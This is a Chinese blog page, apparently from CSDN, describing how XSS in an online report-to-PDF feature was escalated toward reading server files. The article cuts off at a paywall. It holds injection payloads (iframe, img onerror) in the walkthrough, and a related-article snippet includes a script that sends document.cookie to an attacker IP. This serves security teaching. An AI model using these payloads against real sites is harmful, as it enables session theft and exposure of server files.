利用XSS漏洞读取任意文件,get新思路!

最新推荐文章于 2024-06-16 13:05:51 发布
最新推荐文章于 2024-06-16 13:05:51 发布
阅读量3.2k 收藏 5
点赞数 1
分类专栏: 网络安全 文章标签: xss 安全漏洞 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54787877/article/details/114836201
版权
本文介绍了如何利用XSS漏洞读取任意文件。通过网站在线报表功能的XSS解析,逐步演示了从发现解析XSS,到尝试iframe加载,确认JS解析,再到利用file协议和XHR(XMLHttpRequest)读取本地文件的过程,揭示了一种新的攻击思路。
摘要由CSDN通过智能技术生成

简述

    网站是一个在线填写报表功能,填写好报表之后可以生成报表的pdf文件

思路讲解

1. 发现解析xss

    首先随便输入一个payload, "><S>aaa 。发现输入的标签被解析了

图片

2. 用iframe标签加载,但是没有内容

  使用iframe标签,但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20

图片

 

3. 确定可以解析js

d=b9bc3d&utrnumber=<img src=x οnerrοr=document.write('aaaa')>&date=20

图片

 

4. 加载url地址发现file协议

Id=b9bc3d&utrnumber=<img src=x οnerrοr&

最低0.47元/天 解锁文章
大白Tang
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞之PDF生成:从XSS到服务端任意文件读取
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 2928
XSS是最为常见的Web漏洞之一,多年来连续入选OWASP TOP10,相信大家都耳熟能详。 它是一种代码注入类的攻击,是一种客户端侧的攻击,攻击者通过在Web应用中注入恶意JavaScript代码,通过点击URL,最终在受害者浏览器端执行的一种漏洞。主要有反射型XSS、存储型XSS、基于DOM的XSS三类。XSS一些比较常规的危害大概有:重定向浏览器、窃取Cookie、浏览器劫持等。本文章侧重于发现XSS后的进一步利用。 主要介绍在某次实际测试过程中,发现XSS漏洞之后,如何进一步的利用,最终通过XSS
【PHP代码审计】XSS后台敏感操作、文件包含漏洞审计、任意文件读取
weixin_44722125的博客
08-11 665
XSS 看源码只有SQL的过滤没有XSS的过滤 所以我们可以插入任意XSS代码,找出login_ip字段看允许我们输入多少个字符,还需要知道管理员可以做些什么,我们的XSS攻击需要以管理员身份去执行。 字段长度限制为255个字符,所以我们可以在登陆时构造payload,一般都是执行远程js文件,让他可以执行更多的操作。 准备好攻击payload: 找到管理员可以执行的操作 构造paylo...
java代码审计java-sec-code XSS,任意文件读取
最新发布
2401_84466316的博客
06-16 1212
这是一个注解,指示当发出HTTP请求时,应该调用这个方法。具体来说,当客户端发送一个请求到"/reflect"路径时,Spring框架会将该请求路由到这个方法。:这也是一个注解,指示Spring将方法的返回值直接作为HTTP响应体返回给客户端,而不是通过视图解析器渲染成视图。这段代码的作用是接受一个HTTP请求,在"/reflect"路径上,并将请求中的一个参数(命名为xss)原封不动地返回给客户端。
任意文件读取漏洞
m0_57276420的博客
04-08 5515
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
ZhShy
01-12 4822
文章目录1.3.1 文件读取漏洞常见触发点1.3.1.1 web语言1. PHP2.python3.Java4.Ruby5.Node1.3.1.2 中间件、服务件相关1.Nginx错误配置2.数据库3.软链接4.FFmpeg5.Docker-API1.3.1.3 客户端相关1.浏览器/Flash XSS2.MarkDown语法解析器XSS1.3.2 文件读取漏洞常见读取路径1.3.2.1 Linux1.flag名称(相对路径)2.服务器信息(绝对路径)1.3.2.2 Windows 1.3.1 文件读取漏洞
渗透测试 | 一次利用XSS读取源码
MachineGunJoe666
05-17 772
常规的XSS利用方式主要有窃取cookie、恶意链接、获取键盘记录、网页钓鱼、挂马等等,本次渗透首先通过XSS漏洞利用XMLRequest发起ajax请求,实现了发起http请求的目的,并且把请求的结果返回了,通过代码审计,打开了突破的口子。后续还运用到了Nosql注入、绕过2FA验证、kdbx文件解密等等技术,渗透过程涉及很多小的知识点,充满乐趣与挑战,下面开始此次渗透之旅。
xss读取php源码,xss文件页面内容读取(解决)
weixin_39897687的博客
03-09 436
js:document.body.addBehavior("#default#Download");var mycars = new Array();mycars[0] = "l.htm";mycars[1] = "y.htm";for (x in mycars ){if(document.body.startDownload(mycars[x],GetData)){GetData(source)...
xss漏洞利用
icecream_sheep的博客
11-15 1583
首先,我们先在文件夹找到www命名的文件夹里的html文件夹,在里面创建一个hack.php文件,输入这段代码, 然后,再创建一个submit.php文件 然后,打开一个浏览器访问 192.168.xx.xxx(你的虚拟机的IP)/submit.php,然后进入到这个界面 在这个界面输入"/><script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script&...
php漏洞探测思路
01-06
- 文件包含漏洞:通过控制文件路径实现未经授权的文件读取或执行。 #### 三、PHP漏洞探测新思路 1. **理解Zend Engine的工作原理:** - 即使不知道源码细节,也可以通过了解Zend Engine如何处理PHP文件来发现...
PHP代码审计入门指南1
08-04
- **XXE(XML外部实体注入)**:利用XML解析器的外部实体加载功能,读取服务器上的敏感文件或执行命令。 - **反序列化漏洞**:恶意序列化数据可能导致代码执行或数据篡改。 - **LDAP注入**:对LDAP(轻量级目录访问...
xss文件页面内容读取(解决)
09-05
xss文件页面内容读取(解决),需要的朋友可以参考下。
小型在线聊天室php版
03-04
PHP提供了丰富的文件操作函数,如`file_get_contents()`用于读取文件内容,`file_put_contents()`用于写入文件。理解如何使用这些函数来读写文本文件是关键。 4. **前端交互**:前端通常使用HTML、CSS和JavaScript...
CGIC简明教程
07-03
4. **获取请求中的参数值**:CGIC提供了函数来获取POST或GET请求中的参数值,这包括从请求体中解析表单数据,以及处理文件上传等更复杂的情况。 **进阶训练** 进阶部分涉及到如何利用CGIC实现文件上传功能。文件...
springboot在线外卖系统.zip
03-16
例如,使用HTTP的GET方法获取信息,POST方法创建新资源,PUT方法更新资源,DELETE方法删除资源。 5. **前后端分离** 前后端分离的设计模式使得前端和后端可以独立开发和迭代。前端可能使用React、Vue或Angular等...
XSS,文件上传,文件包含】
一纸荒芜的博客
07-31 2639
网络安全面试题
17-xss漏洞
qq_56414082的博客
03-29 629
onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。启动BeFF-XSS并登陆进去可以通过命令也可以图形化页面。
常见Web安全漏洞
Spontaneous_0的博客
03-17 999
常见Web安全漏洞
通过xss在pdf中读取文件
None安全团队
04-16 1490
起初我认为影响不大,但后来将其升级为严重漏洞。 浏览该应用程序时,我遇到了一个功能点,该功能点使我们可以将某些付款明细表下载为PDF。 网址看起来像这样 https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date=2017-08-11&settlement_type=all&advice_id=undefined 我看到utrnumber参数的值在下载的PDF文件中,所以我在utrnumb
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值